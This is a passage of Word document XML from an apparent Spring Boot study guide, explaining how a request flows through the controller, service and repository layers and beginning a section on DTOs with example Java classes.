          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to map the URL to a particular controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD176A6"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C18185" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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tController and @RequestMapping map the incoming URL to a specific method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A927C2C" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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GetMapping("/api/resource") annotation will map the GET request at /api/resource to the method inside the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B267F2"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 Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774A7F16"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA5677"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ResourceController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D40D97" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F1A2528"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tMapping("/api/resource")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29105E6D"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ResponseEntity&lt;String&gt; getResource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74034ED7"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 xml:space="preserve">        return new ResponseEntity&lt;&gt;("Data from API", HttpStatus.OK);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF486B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68E1EB95"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3E1794B0"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the above example, when you hit the URL http://localhost:8080/api/resource, the getResource() method is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFEA72"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4. Service Layer (Business Logic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC1EE54"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After the controller method is invoked, the controller typically calls a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle business logic, interact with databases, or perform computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E10155"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The service layer might interact with a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for database interaction via JPA or JDBC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FCD42C"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 Service</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6481F7"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA9C60"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ResourceService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADD8D5" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31642192"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ring fetchData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6968AEBC"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Simulating fetching data from a database or business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7004542F"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Fetched Data from Database";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E92DF"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CF56255"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2CCA3152"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controller can call the service layer method to fetch the data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2D37B"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A07F478"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ResourceController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3A70D2" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7306D7D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68944699"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ResourceService resourceService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B654B9A" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18121BA1"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tMapping("/api/resource")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BAAA50"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ResponseEntity&lt;String&gt; getResource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592462BA"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tring data = resourceService.fetchData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EC6517"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ResponseEntity&lt;&gt;(data, HttpStatus.OK);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF164B"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5372D83"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20D9D495"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5. Repository Layer (Database Interaction):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD115F"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f the data needs to be fetched from a database, the service layer calls the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repository layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73506105"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 Spring Boot, the repository layer is typically a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that uses </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to query the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6F227"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 Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A4AD64"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209CAC79"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interface ResourceRepository extends JpaRepository&lt;Resource, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35915AF3"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Custom database queries can be added here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AF093"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FCBF824"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6. Data Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB5485"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repository method interacts with the database, processes the request (e.g., fetching data, updating data), and returns the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE64B2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service layer receives the data and prepares it to send back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF0DE3"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7. Response Sent Back to Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B247FC7"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Once the controller receives the processed data from the service layer, it wraps the data into an appropriate response (e.g., ResponseEntity, ModelAndView).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5246C59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response is then sent back to the client with the HTTP status code, headers, and body as necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00180D74"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 Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C8C075"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718C0D83"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message": "Data from API",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF4D3B"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tatus": "success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B72A6FB"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87C96CB"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8. HTTP Status Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1B8A5"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 Boot automatically handles HTTP status codes based on the response. For example, HttpStatus.OK means a successful response with a 200 status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305760C"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If an error occurs, Spring Boot can return error status codes (e.g., HttpStatus.NOT_FOUND for a missing resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E779C"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Example Workflow for a GET Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F7FED"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lient</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sends a GET request to http://localhost:8080/api/resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B8270"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ispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request is routed to the appropriate controller method (ResourceController#getResource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37C646"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ontroller</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The controller method calls the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BE3F20"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ervice Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If necessary, the service layer fetches data from the database using the repository layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52888458"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Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Queries the database (if needed) to fetch the required data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A49F604"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Response</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The controller returns the data to the client in the form of a response body (usually JSON).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FCD52"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lient</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The client receives the response with the data and status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624A2C5"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ummary of Key Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685538D"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Request arrives</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E34F51"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ispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifies the correct controller method based on the URL mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7266C372"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ontroller method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles the logic, possibly interacting with the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repository layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64D157"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Data is processed, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is returned back to the client with the relevant HTTP status and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BFEA39"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is a basic flow for how data is invoked when hitting a URL in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD3D9D" w14:textId="2AE81276"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B879190">
          <v:rect id="_x0000_i2675" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37962A49" w14:textId="0605221F" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="640" w:name="_Toc196308120"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is the DTO getting invoked with REST endpoints</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="640"/>
    </w:p>
    <w:p w14:paraId="45823B62" w14:textId="7ACD75B7" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5"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 a Spring Boot application, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DTOs (Data Transfer Objects)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are often used to transfer data between layers (e.g., controller, service, repository) or between systems (e.g., client-server). They provide a way to structure and transfer data in a format that is suitable for the client while not exposing the internal structure of the domain objects or entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302CF1D9"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Here’s how a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DTO</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gets invoked with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746E41A"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Define the DTO (Data Transfer Object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A9A439"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 DTO is typically a simple POJO (Plain Old Java Object) that contains only the fields you want to transfer, along with getter and setter methods. It can also include validation annotations or any custom formatting needed for the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580DCBF6"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 DTO</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2456917B"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EmployeeDTO {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817F1DA" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A60DB0"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267FC72"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4C5D48"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String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA37204" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F59DBA5"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Constructors, Getters, and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C1AC3"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EmployeeDTO(Long id, String name, String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB922A"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his.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4813419B"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his.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8A3D0"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his.department = department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D412780"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6795112B" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC09D40"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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D790A"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Long getId() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F957D6"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id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB9977"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5A2B3349" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465B552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setId(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DFA180"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his.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76437287"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148DACBE" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A28A6B4"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24900B47"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ame;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450D6BFF"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2EF5013C" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
